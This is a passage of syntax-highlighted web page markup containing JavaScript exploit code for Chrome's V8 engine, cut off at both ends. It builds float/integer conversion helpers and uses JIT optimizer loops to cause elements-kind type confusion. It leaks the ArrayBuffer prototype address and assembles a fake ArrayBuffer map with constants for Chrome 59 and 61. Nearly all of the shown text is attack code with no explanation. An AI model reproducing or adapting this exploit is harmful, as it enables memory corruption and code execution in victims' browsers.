class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">num1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">buffer<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-18\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-19\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">num<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">num<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint32Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">buffer<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">d<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-24\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-25\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_to_float<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">floatarr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">d2u<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">intarr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">floatarr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-32\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-33\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-34\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-35\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-36\"><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-37\"><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-38\"><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-39\"><span class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-40\"><span class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x123<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-41\"><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-42\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-43\"><span class=\"crayon-v\">map_manipulator3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-45\"><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-46\"><span class=\"crayon-v\">evil3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-47\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-48\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">change_elements_kind_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer3<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-49\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-51\"><span class=\"crayon-c\">\/******************************* step 1&nbsp;&nbsp;&nbsp;&nbsp;read ArrayBuffer __proto__ address&nbsp;&nbsp; ***************************************\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-52\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-53\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">arguments<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-54\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-55\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-56\"><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-57\"><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-58\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-59\"><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-60\"><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x123<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-61\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-63\"><span class=\"crayon-v\">map_manipulator4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-64\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-65\"><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2.2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-66\"><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-67\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-68\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">optimizer4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">arraybuffer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">__proto__<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-69\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-71\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-72\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-73\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-74\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-75\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-76\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-77\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-79\"><span class=\"crayon-e\">change_elements_kind_parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">evil4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">arraybuffer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">__proto__<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-80\"><span class=\"crayon-v\">ab_proto_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">u2d<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">e4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-82\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xdaba0000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-83\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_map_obj<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-84\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-85\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x1f000008<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x000900c3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/chrome 59<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-86\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/0x0d00000a,0x000900c4,&nbsp;&nbsp;\/\/chrome 61<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-87\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-cn\">0x082003ff<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-88\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ use ut32.prototype replace it<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-89\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">nop<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5994c4d8266a7993443183-90\"><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5994c4d8266a7993443183-91\"><span class=\"crayon-v\">ab_constructor_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ab_proto_addr<\/span><span 